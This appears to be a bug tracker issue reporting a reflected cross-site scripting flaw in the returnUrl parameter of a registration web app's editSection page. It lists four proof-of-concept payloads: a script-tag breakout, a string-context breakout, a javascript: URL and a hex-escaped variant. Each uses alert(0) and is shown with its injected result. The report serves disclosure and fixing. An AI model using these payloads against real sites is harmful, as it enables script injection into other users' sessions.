Details

    • Complexity:
      Low

      Description

      Some pages execute code passed in through the returnUrl parameter. An example of such a page is /registrationapp/editSection.page. Here are some values of returnUrl that can lead to code execution, either directly or indirectly:

      Value: </script><script>alert(0)</script><script>
      Result: <script>...window.location='</script><script>alert(0)</script><script>';...</script>
      
      Value: ';})});alert(0);(function(){(function(){'
      Result: ..(..{..(..{..window.location='';})});alert(0);(function(){(function(){'';..}..)..}..)..
      
      Value: javascript:alert(0)
      Result: <a href="javascript:alert(0)"> and another <a href="javascript:alert(0)"> generated programmatically
      
      Value: \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29 (evaluates to javascript:alert(0) as a javascript string)
      Result: <a href="javascript:alert(0)"> generated programmatically
      

        Attachments

          Activity

            People

            • Assignee:
              isears Isaac Sears [X] (Inactive)
              Reporter:
              nspin Nick Spinale [X] (Inactive)
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated: